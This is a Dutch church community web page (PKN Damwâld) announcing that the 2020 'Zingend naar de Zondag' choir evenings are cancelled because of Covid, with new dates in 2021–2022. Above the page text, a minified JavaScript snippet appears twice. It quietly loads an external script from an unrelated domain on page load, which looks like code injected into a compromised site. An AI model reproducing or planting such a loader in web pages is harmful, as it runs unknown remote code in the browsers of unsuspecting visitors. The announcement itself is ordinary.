;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zingend naar de Zondag 2020 en daarna ... - PKN Damwâld

Zingend naar de Zondag 2020 en daarna …

Gepubliceerd op: donderdag 17 september 2020

Zoals jullie weten hebben we helaas in maart 2020 Zingend naar de Zondag moeten annuleren i.v.m. het toen net bekend worden van het Corona virus met alle gevolgen van dien. Dit betekende voor ons dat alle voorbereidingen voor niks waren en dat het koor Choir4Hope uit Barneveld in maart niet naar Damwâld kon komen om te zingen. De opbrengst van de collecte zou naar het Prinses Maxima Centrum gaan voor onderzoek naar Kinderkanker. Ook dit kon uiteraard niet doorgaan. In goed overleg met het koor, hebben we dit een jaar uitgesteld naar 20 maart 2021. Helaas waart het virus nog rond en we moeten daarom ook het volgende optreden, in oktober 2020, annuleren. Het ruim 100 leden tellende Chr. Mannenkoor ’t Harde heeft ons afgezegd, omdat zij op dit moment nog niet mogen repeteren en zich daardoor niet (goed) kunnen voorbereiden op deze avond in oktober. Bovendien zouden waarschijnlijk niet alle koorleden naar het noorden willen afreizen vanwege de gezondheidsrisico’s en hebben ze voorgesteld om deze avond op te schuiven naar een andere datum. Wij betreuren dit uiteraard maar begrijpen dit ook heel goed en hebben we in goed overleg een andere datum afgesproken. Ondanks de door onze kerk genomen Corona maatregelen is het ook niet mogelijk om plusminus 400 toeschouwers te ontvangen. En dat is toch iets dat wij graag willen! Kortom, dit jaar organiseren wij geen Zingend naar de Zondag maar wij hopen en bidden dat dit wel weer kan in 2021 en daarna.

Gepland voor 2021/2022
− zaterdagavond 20 maart 2021-Zingend naar de Zondag met medewerking van Choir4Hope uit Barneveld onder leiding van Peter Overduin
− -zaterdagavond 23 oktober 2021 Zingend naar de Zondag met medewerking van de Verenigde Veluwse Koren onder leiding van Leander van der Steen.
− zaterdagavond 19 maart 2022 Zingend naar de Zondag met medewerking van Chr. Mannenkoor ’t Harde onder leiding van Henk van der Maten.

Wij vinden het belangrijk om u dit alvast te melden en hopelijk wordt 2021 net zo succesvol als 2019 en daarvoor. Wat de toekomst brengen moge……………………………………….

Commissie Zingend naar de Zondag Koop en Anneke Schaafsma Kor en Willy Postma